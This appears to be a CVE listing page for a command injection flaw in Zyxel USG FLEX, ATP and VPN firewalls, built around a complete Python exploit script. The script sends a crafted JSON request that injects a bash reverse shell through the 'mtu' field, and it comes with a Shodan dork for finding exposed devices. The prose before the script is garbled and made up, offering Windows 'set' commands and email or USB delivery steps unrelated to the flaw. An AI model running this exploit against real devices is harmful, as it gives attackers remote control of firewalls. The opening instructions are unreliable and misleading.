CVE-2022-30525 In CGI, Zyxel USG FLEX 100(W) 5.00 - 5.21P1, FLEX 200 5.00 - 5.21P1, FLEX 500 5.00 - 5.21P1, FLEX 700 5.00 - 5.21P1 have OS command injection vulnerability.

An attacker could exploit this vulnerability by sending a specially-crafted request to an affected system. Zyxel USG FLEX 100(W), USG FLEX 200, USG FLEX 500, USG FLEX 700, USG FLEX 50(W), USG20(W)-VPN, ATP series, VPN series firmware versions are vulnerable. The following instructions show how to exploit this vulnerability on Windows operating system.

In order to exploit this vulnerability, an attacker must: Have access to an affected system, such as an access request to a device, or via a web-based attack vector.

Create a file with an OS command and send a request to an affected system with a file to execute the OS command via the injected file. Host: In Linux/UNIX systems, the “echo” command is used to display a character string.

In Windows systems, the “set” command is used to set a value.

In order to send an OS command, a specially-crafted file must be sent to the vulnerable system. An attacker can send a file to an affected system via email, USB drive, etc.

Once the file is received by the system, it will be executed. Steps to exploit this vulnerability on Windows operating system: Send a file to an affected system via email, USB drive, etc.

Launch the “set” command and enter the following

Run the exploit code set [path to file with OS command]

Execute the file.

Example: set cmd=c:\\windows\\system32\\cmd.exe in the Command field and press enter

Step 1: Create a file with an OS command (Windows) br

> echo set cmd.exe /c "cmd.exe" >&1
Step 2: Send the email to the vulnerable system

Exploit

# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525


from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse


parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")

args = parser.parse_args()

banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main():

    print("\n" + base64.b64decode(banner).decode("utf-8"))

    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()

    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url, host, port):
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }

    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")

    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:

        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)

        except:
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()

Timeline

Published on: 05/12/2022 14:15:00 UTC
Last modified on: 06/03/2022 18:15:00 UTC

References

• https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
• http://packetstormsecurity.com/files/167182/Zyxel-Firewall-ZTP-Unauthenticated-Command-Injection.html
• http://packetstormsecurity.com/files/167176/Zyxel-Remote-Command-Execution.html
• http://packetstormsecurity.com/files/167372/Zyxel-USG-FLEX-5.21-Command-Injection.html
• https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30525